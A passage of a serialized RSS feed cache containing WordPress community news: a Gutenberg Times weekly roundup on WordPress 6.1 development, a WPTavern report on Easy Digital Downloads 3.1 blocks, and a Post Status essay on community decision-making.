href=\"https://wpbuilds.com/2022/10/04/this-week-in-wordpress-224/\"><img /></a>\n\n\n\n\n<div class=\"is-layout-flow wp-block-group has-light-background-background-color has-background\"><div class=\"wp-block-group__inner-container\">\n<p><strong>Table of Contents</strong></p>\n\n\n\n<div class=\"wp-block-sortabrilliant-guidepost\"><ul><li><a href=\"https://gutenbergtimes.com/feed/#0-word-press-release-information\">Developing Gutenberg and WordPress</a><ul><li><a href=\"https://gutenbergtimes.com/feed/#1-word-press-6-1\">Dev Notes for WordPress 6.1</a></li></ul></li><li><a href=\"https://gutenbergtimes.com/feed/#0-p\">Plugins, Themes, and Tools for #nocode site builders and owners</a></li><li><a href=\"https://gutenbergtimes.com/feed/#2-word-press-6-0-1-and-6-1-scheduled\">Theme Development for Full Site Editing and Blocks</a></li><li><a href=\"https://gutenbergtimes.com/feed/#3-building-themes-for-fse-and-word-press\">Building Blocks and Tools for the Block editor. </a></li><li><a href=\"https://gutenbergtimes.com/feed/#5-s\">Upcoming WordPress events</a><ul><li><a href=\"https://gutenbergtimes.com/feed/#1-l\">Learn WordPress Online Meetups</a></li></ul></li></ul></div>\n</div></div>\n\n\n\n\n<h2 id=\"0-word-press-release-information\">Developing Gutenberg and WordPress</h2>\n\n\n\n<p>This week, the 6.1 release squad collaborated and release Beta 3. Dan Soschin has posted the update <a href=\"https://wordpress.org/news/2022/10/wordpress-6-1-beta-3-now-available/\"><strong>WordPress 6.1 Beta 3 Now Available</strong></a>. You can help test it by following the call for testing </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>Sneak Peek: The meta-team just released the <strong>beta version</strong> of d<a href=\"https://meta.trac.wordpress.org/ticket/6059\"><strong>isplaying Style Variations in the Theme Directory</strong></a>, a trac ticket opened by <strong>Carolina Nymark</strong>.  You can browse an <a href=\"https://wordpress.org/themes/twentytwentytwo/?beta=style_variations\"><em>example with the Twenty-Twenty-Two theme. </em></a></p>\n\n\n\n<p>Developer <strong>Steve Dufresne</strong> <a href=\"https://meta.trac.wordpress.org/ticket/6059#comment:17\">commented </a>:  &#8220;To turn on the feature, add <code>?beta=style_variations</code> to the URL. The URL gets updated when you browse themes, so you&#8217;ll need to re-add it for each theme page and reload. If nothing loads, there are most likely no style variations for that theme—your best chance of finding them is in the <a href=\"https://wordpress.org/themes/tags/full-site-editing/\">&#8216;Block Themes&#8217;</a> category.&#8221; </p>\n\n\n\n<p>When you click on the small variation card below the screenshot you will notice that the screenshot changes to show in with the variation applied. Very slick. The growing interactivity on the Theme directory makes it great fun to spend more time browsing themes and be fascinated by all the creativity. </p>\n\n\n\n<p><em>Reminder: This is still hard hat area, travel at your own risk. </em></p>\n\n\n\n<a href=\"https://wordpress.org/themes/poe/?beta=style_variations\"><img /></a>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>WP Briefing &#8211; <a href=\"https://wordpress.org/news/2022/10/episode-40-all-things-testing-with-special-guests-anne-mccarthy-and-brian-alexander/\"><strong>Episode 40: All Things Testing with Special Guests Anne McCarthy and Brian Alexander</strong></a>, and they discuss with host Josepha Haden, their work on the Testing Team, the FSE outreach program and how to get started with testing in the WordPress project. Testing Beta releases, Gutenberg plugins functionality is one of the most impactful contributions community members can make.  </p>\n\n\n\n<a href=\"https://wordpress.org/news/2022/10/episode-40-all-things-testing-with-special-guests-anne-mccarthy-and-brian-alexander/\"><img /></a>\n\n\n\n<h3 id=\"1-word-press-6-1\">Dev Notes for WordPress 6.1</h3>\n\n\n\n<p><strong>Ryan Welcher</strong> wrote about all the <a href=\"https://make.wordpress.org/core/2022/10/07/create-block-scaffolding-tool-updates/\"><strong>Create-block scaffolding tool updates</strong></a> that went live between the WordPress releases. Technically, you don&#8217;t have to wait for the WordPress release as any changes are already available when they are merged with the Gutenberg plugin. Two new features make the use of the official block scaffolding tool even more useful</p>\n\n\n\n<ul>\n<li>-variant flag to either create static or dynamic block</li>\n\n\n\n<li>&#8212; no-plugin flag to use the tool for adding another block to an existing plugin. </li>\n</ul>\n\n\n\n<p>Documentation was also updated with a separate page on How to create an external template so a developer can extend the script with custom templates.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Glen Davies</strong> wrote about the work on the <a href=\"https://make.wordpress.org/core/2022/10/07/introduction-of-presets-across-padding-margin-and-block-gap/\"><strong>Introduction of presets across padding, margin and block gap</strong></a> to the block editor to provide consistent spacing of blocks and nested blocks out of the box. Learn more about the implementation, fallbacks added for backwards compatibility and how to disable the presets for themes. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Fabian Kägy</strong> wrote the dev notes for <strong><a href=\"https://make.wordpress.org/core/2022/10/04/block-based-template-parts-in-traditional-themes/\">Block-based “template parts” in traditional themes</a>.</strong> That topic isn&#8217;t new to GT readers, though. </p>\n\n\n\n<p><strong>Justin Tadlock</strong> wrote a  <a href=\"https://gutenbergtimes.com/building-a-block-based-header-template-in-a-classic-theme/\"><strong>Building a Block-Based Header Template in a Classic Theme</strong></a> &#8211; A step-by-step tutorial teaches you how to build a block-based header template in a classic theme in WordPress, including CSS tweaks, template parts, pattern creation, and more. Theme authors who are considering adopting block template parts, especially those with classic themes and existing user bases, this tutorial is for you. It touches on a few different features and how they come together.</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Andre Draganescu</strong> wrote about the newly implemented <a href=\"https://make.wordpress.org/core/2022/09/27/navigation-block-fallback-behavior-in-wp-6-1-dev-note/\">Navigation Block Fallback Behavior in WP 6.1</a>. In other words, it describes various scenarios of what happens when a user adds a navigation block for the first time, or switched to a block-theme, that has a navigation block in the header. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p class=\"has-light-background-background-color has-background\"><a href=\"https://make.wordpress.org/core/tag/dev-notes+6-1/\"><strong>More developer notes can be reviewed on the Make Core Blog </strong></a></p>\n\n\n\n<h2 id=\"0-p\">Plugins, Themes, and Tools for #nocode site builders and owners</h2>\n\n\n\n<p>Learn.WordPress On WordPressTV: Benjamin Evans <a href=\"https://wordpress.tv/2022/04/20/no-code-techniques-to-showcase-your-images-on-any-device/\"><strong>No-Code Techniques to Showcase Your Images on Any Device</strong></a>  </p>\n\n\n\n<p><strong>Marko Segota</strong>, Anariel Design, just published a brand-new guide to <a href=\"https://www.anarieldesign.com/wordpress-block-editor-getting-started-guide/\"><strong>Getting started with the WordPress Block Editor.</strong></a> It walks the reader through the first step and explains basic concepts along the way.  If you  know someone how is new to using WordPress or the block editor, this post will quickly get them up to speed. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>In his latest video <strong><a href=\"https://www.youtube.com/watch?v=e399jQagyTQ\">&#8220;I found all the CHANGES Coming To WordPress 6.1 in 5 mins&#8221;</a> </strong>core contributor, <strong>Dave Smith</strong>, points you to five resources where you will find information about updates of the block editor and what is to come to WordPress 6.1 on November 1, 2022. Among them a very kind mention of the Gutenberg Changelog podcast (#4). <a href=\"https://gutenbergtimes.com/podcast/gutenberg-changelog-68-wordcamp-europe-gutenberg-13-4-and-wordpress-6-1/\">Dave Smith was a special guest on the show of our 68th episode.</a></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Casey Cavanagh</strong>, technical writer at Awesome Motive reports on the release of Easy Digital Download plugin: <strong><a href=\"https://easydigitaldownloads.com/blog/new-edd-3-1-release-core-blocks/\">Introducing 10 New Core Blocks, Email Summaries &amp; More…</a>. </strong>Among the blocks mentioned are the blocks to display the Cart, a login form or the Order History of a customer. But there is more. </p>\n\n\n\n<p><strong>Sarah Gooding</strong> at the WPTavern has the skinny for you: <a href=\"https://wptavern.com/easy-digital-downloads-3-1-adds-10-new-core-blocks-introduces-email-summaries\"><strong>Easy Digital Downloads 3.1 Adds 10 New Core Blocks, Introduces Email Summaries</strong></a></p>\n\n\n\n<div class=\"is-layout-flow wp-block-group has-light-background-background-color has-background\"><div class=\"wp-block-group__inner-container\">\n<p><strong>🎙️ </strong> New episode:  <a href=\"https://gutenbergtimes.com/podcast/gutenberg-changelog-74-gutenberg-14-2-14-3-wordpress-6-1-style-variations-in-theme-directory-course-on-gutenberg-data-layer/\">Gutenberg Changelog #74 – Gutenberg 14.2, 14.3, WordPress 6.1, Style Variations in Theme Directory, Course on Gutenberg Data Layer</a> with special guest, Dave Smith, and host Birgit Pauli-Haack</p>\n</div></div>\n\n\n\n<p>ICYMI: Gutenberg 14.2 was release last week. <strong>Sarah Gooding</strong> wrote about it on the WPTavern. <a href=\"https://wptavern.com/gutenberg-14-2-improves-writing-flow-adds-kerning-controls-for-headings-in-global-styles\"><strong>Gutenberg 14.2 Improves Writing Flow, Adds Kerning Controls for Headings in Global Styles</strong></a>. Gooding wrote: &#8220;One of the most impactful improvements to the writing flow is that the editor now <a href=\"https://github.com/WordPress/gutenberg/pull/44083\">hides all floating block UI</a> while the user is typing.&#8221;</p>\n\n\n\n<p><em>On the Gutenberg Changelog podcast we will cover Gutenberg plugin versions 14.2 and 14.3 in next week&#8217;s recording. </em></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Nick Diego</strong>, creator of the Icon Block, announced an update for his plugin: <strong><a href=\"https://nickdiego.com/icon-block-turns-one/\">The Icon Block turns one plus a recap of Version 1.3.0</a></strong>. In core open-source manner, Diego started working on the plugin as he needed an efficient way to add SVG icons to the Editor. &#8220;Over 4,000 active installs later, the Icon Block has become one of my favorite side projects.&#8221; he wrote. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>WooCommerce Block 8.6 </strong>is available now. <strong>Marco Lucio Giannotta</strong> published the <a href=\"https://developer.woocommerce.com/2022/09/27/woocommerce-blocks-8-6-0-release-notes/\">WooCommerce Blocks 8.6.0 Release Notes</a>. </p>\n\n\n\n<p><strong>Sarah Gooding</strong> dug in and reported among other things on the new <a href=\"https://wptavern.com/woocommerce-blocks-8-6-0-introduces-cross-sells-products-block\">Cross-Sells Products Block</a> feature</p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p>In this video on WordPressTV  <a href=\"https://wordpress.tv/2022/04/20/no-code-techniques-to-showcase-your-images-on-any-device/\"><strong>No-Code Techniques to Showcase Your Images on Any Device</strong></a>, <strong>Benjamin Evans</strong>, faculty member at Learn.WordPress walks you through some concepts of responsive design, and the options WordPress offers to showcase images responsively without using any code.  </p>\n\n\n\n<h2 id=\"2-word-press-6-0-1-and-6-1-scheduled\">Theme Development for Full Site Editing and Blocks</h2>\n\n\n\n<p><strong>Rich Tabor</strong>, Extendify and <strong>Damon Cook</strong>, WP Engine joined Doc Pop on <a href=\"https://www.youtube.com/watch?v=jPJtYe7XWcg\"><strong>last week&#8217;s Torque Social Hour</strong></a> to talk about recent trends and advancements in the world of WordPress themes.</p>\n\n\n\n\n<p><strong>&nbsp;<a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/\" target=\"_blank\" rel=\"noreferrer noopener\">&#8220;Keeping up with Gutenberg &#8211; Index 2022&#8221;</a>&nbsp;</strong><br />A chronological list of the WordPress Make Blog posts from various teams involved in Gutenberg development: Design, Theme Review Team, Core Editor, Core JS, Core CSS, Test and Meta team from Jan. 2021 on. Updated by yours truly.  <a href=\"https://make.wordpress.org/core/handbook/references/keeping-up-with-gutenberg-index/keeping-up-with-gutenberg-index-2020/\"><em>The index 2020 is here</em></a></p>\n\n\n\n\n\n<div class=\"ngl-articles colored ngl-articles-30_70 ngl-articles-frontend\">\n\n	\n	<div class=\"ngl-articles-wrap ngl-articles-webview\">\n	\n						\n			<div class=\"ngl-article-mobile\">\n				<table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n					<tr>\n						<td valign=\"top\">\n							<div class=\"ngl-article-mob-wrap\">\n							<div class=\"ngl-article-featured\"><a href=\"https://gutenbergtimes.com/block-based-template-parts-for-classic-themes/\" target=\"_self\" rel=\"\"><img src=\"https://i0.wp.com/gutenbergtimes.com/wp-content/uploads/2022/09/block-based-template-parts.png?w=652&ssl=1\" /></a></div><div class=\"ngl-article-title\"><a href=\"https://gutenbergtimes.com/block-based-template-parts-for-classic-themes/\" target=\"_self\" rel=\"\"><span>Block-Based Template Parts: A Happy Medium Between Classic and Block Themes</span></a></div><div class=\"ngl-article-excerpt\">I was one of the early adopters of the block editor as a developer. Despite the flak that the Gutenberg plugin was catching before it was merged into core WordPress, …a post by Justin Tadlock)</div>							</div>\n						</td>\n					</tr>\n				</table>\n			</div>\n			\n			\n			\n\n		\n		\n		</div>\n\n</div>\n\n\n\n\n<h2 id=\"3-building-themes-for-fse-and-word-press\">Building Blocks and Tools for the Block editor. </h2>\n\n\n\n<p>On the podcast WPTavern Jukebox podcast, Nathan Wrigley has Alex Ball,  as guest on the episode <a href=\"https://wptavern.com/podcast/45-alex-ball-on-customizing-core-blocks-for-clients\"><strong>#45 – Alex Ball on Customizing Core Blocks for Clients</strong></a>  &#8220;Alex is a Lead Software Engineer at Mindgrub, a digital agency in Baltimore, Maryland. His website leadership experience continues to inform his decision-making today, especially for training clients and making the block editor as easy to use as possible, and that, in essence, is the subject of the podcast.&#8221; wrote Wrigley. </p>\n\n\n\n<p>As mentioned in the show, Alex Ball also gave a presentation at <strong><a href=\"https://us.wordcamp.org/2022/\">WordCamp US</a></strong> with the same title. You can watch it <a href=\"https://www.youtube.com/watch?v=-hWtGDLc_Nk&t=19946s\">now on YouTube</a> from the WCUS live stream.  </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Arjun Singh</strong> wrote a guide to <a href=\"https://css-tricks.com/getting-started-with-wordpress-block-development/\"><strong>Getting Started With WordPress Block Development</strong></a>.  Singh starts with &#8220;to me, a block is an entity, with some properties (called attributes), that represents some content. I know this sounds pretty vague, but stay with me. A block basically manifests itself in two ways: as a graphical interface in the block editor or as a chunk of data in the database.&#8221; He explains the concepts and code examples in details, especially the files and their purpose after using the official create-block scaffolding tool. </p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n<p><strong>Ganesh Dahal</strong> walk you through the solution on <a href=\"https://css-tricks.com/how-to-customize-wordpress-block-theme-cover-templates-with-dynamic-post-feature-images/\"><strong>How To Customize WordPress Block Theme Cover Templates with Dynamic Post Feature Images</strong></a>. He explains how with the new template editor you can as hero section on your single block post and automatically display the post title without any programming. Dahal also reviews themes that deliver this out of the box and walk you through it to style a custom theme implementation.  </p>\n\n\n\n\n<p><strong><a href=\"https://gutenbergtimes.com/need-a-zip-from-master/\">Need a plugin .zip from Gutenberg&#8217;s master branch?</a></strong><br />Gutenberg Times provides daily build for testing and review. <br />Have you been using it? Hit reply and let me know.</p>\n\n\n\n<p><img alt=\"GitHub all releases\" src=\"https://img.shields.io/github/downloads/bph/gutenberg/total?style=for-the-badge\" /></p>\n\n\n\n\n<h2 id=\"5-s\">Upcoming WordPress events</h2>\n\n\n\n<p><strong>Oct 11 – 13, 2022</strong><br /><strong><a href=\"https://woosesh.com/\" target=\"_blank\" rel=\"noreferrer noopener\">WooSesh</a> <a href=\"https://woosesh.com/\" target=\"_blank\" rel=\"noreferrer noopener\"> A virtual conference for WooCommerce</a></strong><br />The schedule is now available. I am excited for Darren Ethier’s <strong>The Future of Personalizing Your Storefront</strong> and what WooCommerce is doing in the era of WordPress Full Site Editing (FSE) on October 12 at 1pm EDT / 17:00 UTC.</p>\n\n\n\n<p class=\"has-light-background-background-color has-background\"><a href=\"https://central.wordcamp.org/schedule/\"><strong>Have a look at the schedule of upcoming WordCamps</strong></a>.</p>\n\n\n\n<h3 id=\"1-l\">Learn WordPress Online Meetups</h3>\n\n\n\n<p>October 17, 2022 &#8211;  4 pm EDT  / 12:00 UTC <br /><a href=\"https://www.meetup.com/learn-wordpress-online-workshops/events/288666247/\"><strong>Part 1: Re-Creating Block Designs</strong></a> with Wes Theron</p>\n\n\n\n<p>October 31, 2022 &#8211; 4 pm EDT / 12:00 UTC <br /><a href=\"https://www.meetup.com/learn-wordpress-online-workshops/events/288666280/\"><strong>Part 2: Re-Creating Block Designs</strong></a></p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\" />\n\n\n\n\n<p>Featured Image: <a href=\"https://wordpress.org/photos/author/mdburnette/\">Marcus Burnette:</a> <a href=\"https://wordpress.org/photos/photo/56633defe8/\">A couple of bookshelves with colorful books on a stone wall</a> &#8211; WordPress Photos</p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity is-style-wide\" />\n\n\n\n<p class=\"has-text-align-left\"><strong>Don&#8217;t want to miss the next Weekend Edition? </strong></p>\n\n\n\n<form class=\"wp-block-newsletterglue-form ngl-form ngl-portrait\" action=\"https://gutenbergtimes.com/feed/\" method=\"post\"><div class=\"ngl-form-container\"><div class=\"ngl-form-field\"><label class=\"ngl-form-label\" for=\"ngl_email\"><br />Type in your Email address to subscribe.</label><div class=\"ngl-form-input\"><input type=\"email\" class=\"ngl-form-input-text\" name=\"ngl_email\" id=\"ngl_email\" /></div></div><button type=\"submit\" class=\"ngl-form-button\">Subscribe</button><p class=\"ngl-form-text\">We hate spam, too and won&#8217;t give your email address to anyone except Mailchimp to send out our Weekend Edition</p></div><div class=\"ngl-message-overlay\"><div class=\"ngl-message-svg-wrap\"></div><div class=\"ngl-message-overlay-text\">Thanks for subscribing.</div></div><input type=\"hidden\" name=\"ngl_list_id\" id=\"ngl_list_id\" value=\"26f81bd8ae\" /><input type=\"hidden\" name=\"ngl_double_optin\" id=\"ngl_double_optin\" value=\"yes\" /></form>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity is-style-wide\" />\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sat, 08 Oct 2022 19:10:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:18:\"Birgit Pauli-Haack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:41;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:88:\"WPTavern: Easy Digital Downloads 3.1 Adds 10 New Core Blocks, Introduces Email Summaries\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=138444\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:98:\"https://wptavern.com/easy-digital-downloads-3-1-adds-10-new-core-blocks-introduces-email-summaries\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3979:\"<img />\n\n\n\n<p>Easy Digital Downloads (EDD) put out a big release today, following several maintenance releases and the last major release in July. <a href=\"https://easydigitaldownloads.com/blog/new-edd-3-1-release-core-blocks/\">Version 3.1</a> introduces 10 new core blocks  available to users who are running WordPress 5.8 or newer:</p>\n\n\n\n<ul>\n<li><a href=\"https://easydigitaldownloads.com/blog/new-edd-3-1-release-core-blocks/#buy-button\">Buy Button</a></li>\n\n\n\n<li><a href=\"https://easydigitaldownloads.com/blog/new-edd-3-1-release-core-blocks/#order-history\">Order History</a></li>\n\n\n\n<li><a href=\"https://easydigitaldownloads.com/blog/new-edd-3-1-release-core-blocks/#products\">Products</a></li>\n\n\n\n<li><a href=\"https://easydigitaldownloads.com/blog/new-edd-3-1-release-core-blocks/#registration-form\">Registration Form</a></li>\n\n\n\n<li><a href=\"https://easydigitaldownloads.com/blog/new-edd-3-1-release-core-blocks/#login-form\">Login Form</a></li>\n\n\n\n<li><a href=\"https://easydigitaldownloads.com/blog/new-edd-3-1-release-core-blocks/#download-terms\">Download Terms</a></li>\n\n\n\n<li><a href=\"https://easydigitaldownloads.com/blog/new-edd-3-1-release-core-blocks/#receipt\">Receipt</a></li>\n\n\n\n<li><a href=\"https://easydigitaldownloads.com/blog/new-edd-3-1-release-core-blocks/#confirmation\">Confirmation</a></li>\n\n\n\n<li><a href=\"https://easydigitaldownloads.com/blog/new-edd-3-1-release-core-blocks/#cart\">Cart</a></li>\n\n\n\n<li><a href=\"https://easydigitaldownloads.com/blog/new-edd-3-1-release-core-blocks/#checkout\">Checkout (Beta)</a></li>\n</ul>\n\n\n\n<p>These blocks enable store owners to do more than their shortcode predecessors. Although the shortcodes still work, the block versions allow for much easier customization with a better UI. One example in the announcement is the Order History block. The previous Purchase History shortcode output a simple table of orders, but the new Order History block has a card style view and allows users to easily modify the number of columns and how many orders are displayed per page. </p>\n\n\n\n\n<img />Purchase History shortcode output\n\n\n\n<img />New Order History block\n\n\n\n\n<p>The other blocks have been updated in a similar fashion, with extended functionality and greatly expanded customization options. </p>\n\n\n\n<p>It&#8217;s important to note that the new Checkout block was released in beta. It is not turned on by default for new stores yet. Users who want to test the block will notice that EDD has reordered some of the fields to improve conversions, improved the user context detection (only showing necessary fields to users), and redesigned the payment method picker.</p>\n\n\n\n<p>Email Summaries is a new feature for store owners in 3.1. It sends a weekly or monthly email to the admin or other custom recipients with a store update that includes metrics like gross and net revenue, new customers, and average order amount. It can also be disabled in the admin.</p>\n\n\n\n<img />\n\n\n\n<p>A few other notable changes in version 3.1 include the following: </p>\n\n\n\n<ul>\n<li>New setting to require users to login to download files </li>\n\n\n\n<li>Success Page has been renamed to Confirmation Page to differentiate it from the receipt</li>\n\n\n\n<li>More detailed views and filtering options for Reports</li>\n\n\n\n<li>reCAPTCHA keys added to Downloads » Settings » Misc so users can automatically enable reCAPTCHA for the lost password and the registration forms</li>\n\n\n\n<li>New color options for purchase buttons</li>\n\n\n\n<li>New &#8220;View Receipt&#8221; link in the orders table</li>\n</ul>\n\n\n\n<p><a href=\"https://wordpress.org/plugins/easy-digital-downloads/\">Easy Digital Downloads</a> is installed on more than 50,000 WordPress sites. The ten-year-old plugin is continuing to evolve and become a more block-friendly tool for selling digital products. Check out the <a href=\"https://easydigitaldownloads.com/blog/new-edd-3-1-release-core-blocks/\">announcement</a> post for a full tour of all the new blocks and their capabilities.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 07 Oct 2022 21:56:44 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:42;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"Post Status: How Open Source is WordPress?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:32:\"https://poststatus.com/?p=127255\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"https://poststatus.com/how-open-source-is-wordpress/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4833:\"<h2>And how much weight does the community carry?</h2>\n\n\n\n<div class=\"wp-container-31 wp-block-group eplus-wrapper has-theme-palette-2-color has-theme-palette-8-background-color has-text-color has-background\"><div class=\"wp-block-group__inner-container\"><div class=\"wp-block-post-excerpt\"><p class=\"wp-block-post-excerpt__excerpt\">Decision-by-committee is difficult enough, and decision-by-community is called an election. Surely there must be a way that we can gather information, keep the community informed, and move forward in a mutually-beneficial way. </p></div>\n\n\n<div class=\"wp-block-spacer eplus-wrapper\"></div>\n\n\n\n<p class=\"yoast-reading-time__wrapper\"><span class=\"yoast-reading-time__icon\"></span><span class=\"yoast-reading-time__spacer\"></span><span class=\"yoast-reading-time__descriptive-text\">Estimated reading time:  </span><span class=\"yoast-reading-time__reading-time\">4</span><span class=\"yoast-reading-time__time-unit\"> minutes</span></p>\n</div></div>\n\n\n\n<p class=\"has-drop-cap\">This week we’ve seen a lot of discussion around the Active Install Growth Chart in the WordPress Repository.&nbsp;<a href=\"https://twitter.com/markzahra/status/1577402239232184339\" target=\"_blank\" rel=\"noreferrer noopener\">Mark Zahra</a>&nbsp;has rallied the community to push back and find answers. He has an&nbsp;<a href=\"https://meta.trac.wordpress.org/ticket/6511\" target=\"_blank\" rel=\"noreferrer noopener\">open meta Trac ticket</a>&nbsp;you can follow and comment on to see where this goes, but it does beg the question: how open is our open-source community when decisions can be made unilaterally without warning and without community input? </p>\n\n\n\n<p>This isn’t the first time the community has dealt with changes (remember when Gutenberg was introduced?), and it certainly won’t be the last time (history in any community bears witness to this), but when should the community be involved, how much involvement should there be, and how and when do you notify the community at large? </p>\n\n\n\n<p>Decision-by-committee is difficult enough, and decision-by-community is called an election. Surely there must be a way that we can gather information, keep the community informed, and move forward in a mutually-beneficial way. I don’t claim to have solutions, but I, along with many of you, will be watching to see how this goes.</p>\n\n\n\n<div class=\"wp-container-32 wp-block-group has-theme-palette-8-background-color has-background\"><div class=\"wp-block-group__inner-container\">\n<h2 id=\"h-brace-yourself-black-friday-is-coming-and-cyber-monday-too\">Brace Yourself &#8211; Black Friday is Coming (and Cyber Monday, too)</h2>\n\n\n\n<p>Black Friday/Cyber Monday will be here soon! (I can’t believe it either.) And as we have in years past, we’d like to help you get the word out on your deals. Head over to&nbsp;<a href=\"https://poststatus.com/submit-black-friday-cyber-monday-deals/\">our intake form</a>, and we will add the deals you submit to our dedicated annual BF/CM page. </p>\n\n\n\n<p><em>Our 2022 BFCM page will be published on <strong>October 19</strong> and updated several times weekly thereafter.</em></p>\n</div></div>\n\n\n\n<h2>Racism and Allyship</h2>\n\n\n\n<p>Racism and Allyship continue to be a conversation in the WordPress community. <strong>Allie Nimmons</strong> recently hosted a two-hour webinar on <a href=\"https://poststatus.us6.list-manage.com/track/click?u=ff3456b27ebe0be0155087894&id=d27532b278&e=ace7e1119f\" target=\"_blank\" rel=\"noreferrer noopener\">How to Be a Better Ally</a>. Feedback on the event was all positive, mostly due to the non-lecture way that Allie presents on the topic, and also the workshop approach to challenging the attendees to think about their current beliefs and how they consider themselves allies, how they think they can do better, and how we can all challenge ourselves to think about our place in the community to one another. I consider myself an ally, and I look for ways that I can improve continually, and this workshop helped me move forward in that even more. If you weren’t able to attend, you can still purchase the event and watch it online. I urge you to do it.</p>\n\n\n\n<div class=\"wp-container-33 wp-block-group has-theme-palette-8-background-color has-background\"><div class=\"wp-block-group__inner-container\">\n<h2><strong>New Post Status Meetup/Huddle for Europe</strong></h2>\n\n\n\n<p>To accommodate more availability for our European member, hosts Jason Rouet and Evangelia Pappa will be holding our Post Status Member Huddle on <strong>Fridays @ 2pm Paris (+2).</strong> <a href=\"https://poststatus.us6.list-manage.com/track/click?u=ff3456b27ebe0be0155087894&id=95e0780bdd&e=ace7e1119f\" target=\"_blank\" rel=\"noreferrer noopener\">SIGN UP →</a></p>\n</div></div>\n<p>This article was published at Post Status — the community for WordPress professionals.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 07 Oct 2022 17:50:59 